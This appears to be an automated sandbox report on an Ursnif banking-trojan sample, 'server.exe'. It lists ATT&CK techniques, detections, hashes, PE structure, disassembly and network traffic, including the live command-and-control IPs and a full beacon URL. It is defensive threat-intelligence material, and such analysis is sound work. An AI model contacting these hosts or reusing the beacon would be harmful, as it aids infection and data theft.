Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	12 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	124 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
server.exe	13%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.server.exe.2bd0000.3.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
0.2.server.exe.2190174.1.unpack	100%	Avira	TR/Kazy.4159236	Download File
0.2.server.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://62.173.142.51/drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk	0%	Avira URL Cloud	safe
http://94.103	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
checklist.skype.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.173.142.51/drew/HAyCvnAuEOt2F7C/qtqWyxm4JAodLmr2fA/5rIXi6c7a/A8VZuoBaw9m9tdhD88nR/7GG7oRWMVub4oY7_2BO/OtqOu0B56I1LS_2FdHx85_/2FJqjErmgnBnc/fR5wyLVd/zR03KdsDmrJhOpNTELG8Ap7/tRbeA0rm1D/Ahqeb_2B_2Fx66NAH/sAJz2fkfv30m/_2B2yXv1C0u/OTAlb_2Bjz3Xu9/n7nMr5QIveWoLOKJgWpZZ/FZTPBpvOXNqs9vrA/ayBpSg1Jbp3hq/vUJdeVU7/u.jlk	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.103	server.exe, 00000000.00000002.569377745.00000000027FC000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.173.142.51	unknown	Russian Federation		34300	SPACENET-ASInternetServiceProviderRU	true
94.103.183.153	unknown	Russian Federation		197390	RATELE-ASRU	false

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	826138
Start date and time:	2023-03-14 12:25:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	server.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 69.7% (good quality ratio 67.8%) Quality average: 82.1% Quality standard deviation: 26.5%
HCA Information:	Successful, ratio: 98% Number of executed functions: 39 Number of non-executed functions: 38
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: server.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
62.173.142.51	server.exe	Get hash	malicious	Ursnif	Browse
	server.exe	Get hash	malicious	Ursnif	Browse
	server.exe	Get hash	malicious	Ursnif	Browse
94.103.183.153	server.exe	Get hash	malicious	Ursnif	Browse
94.103.183.153	server.exe	Get hash	malicious	Ursnif	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RATELE-ASRU	server.exe	Get hash	malicious	Ursnif	Browse	94.103.183.153
	server.exe	Get hash	malicious	Ursnif	Browse	94.103.183.153
	https://drugfreesport.info/lqb4s	Get hash	malicious	Phisher	Browse	94.103.183.131
	file.exe	Get hash	malicious	Amadey, Raccoon Stealer v2, RedLine	Browse	94.103.183.33
	tdmGGmdqKV.exe	Get hash	malicious	RedLine	Browse	94.103.183.33
	Zqtx6ddArE.exe	Get hash	malicious	RedLine	Browse	94.103.183.33
	boatnet.arm7.elf	Get hash	malicious	Unknown	Browse	94.103.188.36
	boatnet.x86.elf	Get hash	malicious	Unknown	Browse	94.103.188.36
	boatnet.arm.elf	Get hash	malicious	Unknown	Browse	94.103.188.36
	file.exe	Get hash	malicious	RedLine	Browse	94.103.183.197
	file.exe	Get hash	malicious	RedLine	Browse	94.103.183.197
	AvS8aoWXxI.exe	Get hash	malicious	RedLine	Browse	94.103.183.219
	vdBv52v29c.elf	Get hash	malicious	Mirai	Browse	94.103.188.36
	lz47Kwn9w4.elf	Get hash	malicious	Mirai	Browse	94.103.188.36
	untODBSHdU.elf	Get hash	malicious	Mirai	Browse	94.103.188.36
	2D6T4RxWsP.elf	Get hash	malicious	Mirai	Browse	94.103.188.36
	4ISX4nRn8l.elf	Get hash	malicious	Mirai	Browse	94.103.188.36
	b2dbec9d623300bf09f55ec179a2b5e4cd5a4c6cea7a5.exe	Get hash	malicious	RedLine	Browse	94.103.183.119
	BKrhxR1U4N.exe	Get hash	malicious	RedLine	Browse	94.103.183.119
	10A647A3727CA36B57126F6F8985EEE82A511DE435180.exe	Get hash	malicious	RedLine	Browse	94.103.183.121
SPACENET-ASInternetServiceProviderRU	server.exe	Get hash	malicious	Ursnif	Browse	62.173.142.51
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.142.51
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.142.51
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.236
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.236
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.236
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.141.36
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.141.36
	lQj2udnlAj.exe	Get hash	malicious	Ursnif	Browse	62.173.141.36
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.141.36
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.138.6
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.138.6
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.138.6
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103
	server.exe	Get hash	malicious	Ursnif	Browse	62.173.140.103

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.726307472466791
TrID:	Win32 Executable (generic) a (10002005/4) 91.23% Win32 Executable Borland Delphi 7 (665061/41) 6.07% Win32 Executable Borland Delphi 6 (262906/60) 2.40% Win32 Executable Delphi generic (14689/80) 0.13% Windows Screen Saver (13104/52) 0.12%
File name:	server.exe
File size:	616960
MD5:	43cfce2e126b1bf5230e51edd205f6bd
SHA1:	9ca60bfc3cb13b40f02810869ce9531cb0ab76d4
SHA256:	47d288233a39a68396567e35a77a500e296218df3a4bc9daca797e75b4b03d4b
SHA512:	72f203491fab6d44c9f2466b877af56929ba8f24b136b2b706265605e529774efa82bc97b6967791a5d6cd294712667b9a470e543051caa10beb3a73bbab7b78
SSDEEP:	12288:pAP6umkdcE8lZqRpTy2TTHoKKob0xW7//PExk+eVPeYm:Ky0H8lZqRZy4IsHMpeVPq
TLSH:	2FD46C23A2F14437D17717789C7B9766583ABE102E38A88A2BE42D4C4F3D69139753E3
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b99988fcd4f66e0f

Static PE Info

General

Entrypoint:	0x476dac
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c180eab77990cded75f412955c2aa3af

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFECh
xor eax, eax
mov dword ptr [ebp-14h], eax
mov eax, 00476AFCh
call 00007F7CFCA5A25Ch
xor eax, eax
push ebp
push 00476E2Dh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
mov eax, dword ptr [00478AACh]
mov eax, dword ptr [eax]
call 00007F7CFCAAE50Eh
lea edx, dword ptr [ebp-14h]
mov eax, dword ptr [00478AACh]
mov eax, dword ptr [eax]
call 00007F7CFCAAEBA7h
mov eax, dword ptr [ebp-14h]
cmp byte ptr [eax+03h], 0000006Dh
je 00007F7CFCACAB1Ah
mov ecx, dword ptr [00478C4Ch]
mov eax, dword ptr [00478AACh]
mov eax, dword ptr [eax]
mov edx, dword ptr [004762D4h]
call 00007F7CFCAAE4F6h
mov eax, dword ptr [00478AACh]
mov eax, dword ptr [eax]
call 00007F7CFCAAE56Ah
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
push 00476E34h
lea eax, dword ptr [ebp-14h]
call 00007F7CFCA57E71h
ret
jmp 00007F7CFCA577EBh
jmp 00007F7CFCACAAF2h
call 00007F7CFCA57CF0h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7a000	0x22ea	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x12e00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7f000	0x93a8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7e000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x75e3c	0x76000	False	0.5166139764300848	data	6.558727650455389	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x77000	0x1d48	0x1e00	False	0.42109375	data	4.29996788400184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x79000	0xcd9	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x7a000	0x22ea	0x2400	False	0.3569878472222222	data	4.9532912812050425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x7d000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7e000	0x18	0x200	False	0.048828125	data	0.2005819074398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x7f000	0x93a8	0x9400	False	0.5329919763513513	data	6.614677812315155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x12e00	0x12e00	False	0.6307300289735099	data	6.594926097852816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x89d20	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"
RT_CURSOR	0x89e54	0x134	data
RT_CURSOR	0x89f88	0x134	data
RT_CURSOR	0x8a0bc	0x134	data
RT_CURSOR	0x8a1f0	0x134	data
RT_CURSOR	0x8a324	0x134	data
RT_CURSOR	0x8a458	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"
RT_BITMAP	0x8a58c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8a75c	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380
RT_BITMAP	0x8a940	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8ab10	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8ace0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8aeb0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8b080	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8b250	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8b420	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8b5f0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360
RT_BITMAP	0x8b7c0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128
RT_ICON	0x8b8a8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_DIALOG	0x8bb90	0x52	data
RT_STRING	0x8bbe4	0xec	data
RT_STRING	0x8bcd0	0x42c	data
RT_STRING	0x8c0fc	0x434	data
RT_STRING	0x8c530	0x330	data
RT_STRING	0x8c860	0x4cc	data
RT_STRING	0x8cd2c	0x3e4	data
RT_STRING	0x8d110	0x388	data
RT_STRING	0x8d498	0x440	data
RT_STRING	0x8d8d8	0x554	data
RT_STRING	0x8de2c	0x434	data
RT_STRING	0x8e260	0x510	data
RT_STRING	0x8e770	0x1e4	data
RT_STRING	0x8e954	0x1a4	data
RT_STRING	0x8eaf8	0x11c	data
RT_STRING	0x8ec14	0x2b8	data
RT_STRING	0x8eecc	0xe0	data
RT_STRING	0x8efac	0x12c	data
RT_STRING	0x8f0d8	0x290	data
RT_STRING	0x8f368	0x40c	data
RT_STRING	0x8f774	0x37c	data
RT_STRING	0x8faf0	0x3d4	data
RT_STRING	0x8fec4	0x250	data
RT_STRING	0x90114	0xec	data
RT_STRING	0x90200	0x1dc	data
RT_STRING	0x903dc	0x3ec	data
RT_STRING	0x907c8	0x3f4	data
RT_STRING	0x90bbc	0x30c	data
RT_STRING	0x90ec8	0x328	data
RT_RCDATA	0x911f0	0xa604	data	English	United States
RT_RCDATA	0x9b7f4	0x10	data
RT_RCDATA	0x9b804	0x394	data
RT_RCDATA	0x9bb98	0x18d	Delphi compiled form 'TForm1'
RT_GROUP_CURSOR	0x9bd28	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x9bd3c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x9bd50	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x9bd64	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x9bd78	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x9bd8c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x9bda0	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x9bdb4	0x14	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReleaseMutex, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StrokePath, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharLowerA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.462.173.142.5149685802033203 03/14/23-12:27:29.882824	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49685	80	192.168.2.4	62.173.142.51

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2023 12:27:29.824017048 CET	49685	80	192.168.2.4	62.173.142.51
Mar 14, 2023 12:27:29.882249117 CET	80	49685	62.173.142.51	192.168.2.4
Mar 14, 2023 12:27:29.882410049 CET	49685	80	192.168.2.4	62.173.142.51
Mar 14, 2023 12:27:29.882823944 CET	49685	80	192.168.2.4	62.173.142.51
Mar 14, 2023 12:27:29.941139936 CET	80	49685	62.173.142.51	192.168.2.4
Mar 14, 2023 12:27:29.941441059 CET	80	49685	62.173.142.51	192.168.2.4
Mar 14, 2023 12:27:29.941647053 CET	49685	80	192.168.2.4	62.173.142.51
Mar 14, 2023 12:27:29.944274902 CET	49685	80	192.168.2.4	62.173.142.51
Mar 14, 2023 12:27:30.002386093 CET	80	49685	62.173.142.51	192.168.2.4
Mar 14, 2023 12:27:49.975713015 CET	49686	80	192.168.2.4	94.103.183.153
Mar 14, 2023 12:27:52.990417957 CET	49686	80	192.168.2.4	94.103.183.153
Mar 14, 2023 12:27:58.994245052 CET	49686	80	192.168.2.4	94.103.183.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 14, 2023 12:26:09.669512987 CET	62577	53	192.168.2.4	8.8.8.8
Mar 14, 2023 12:26:09.698645115 CET	53	62577	8.8.8.8	192.168.2.4

DNS Queries

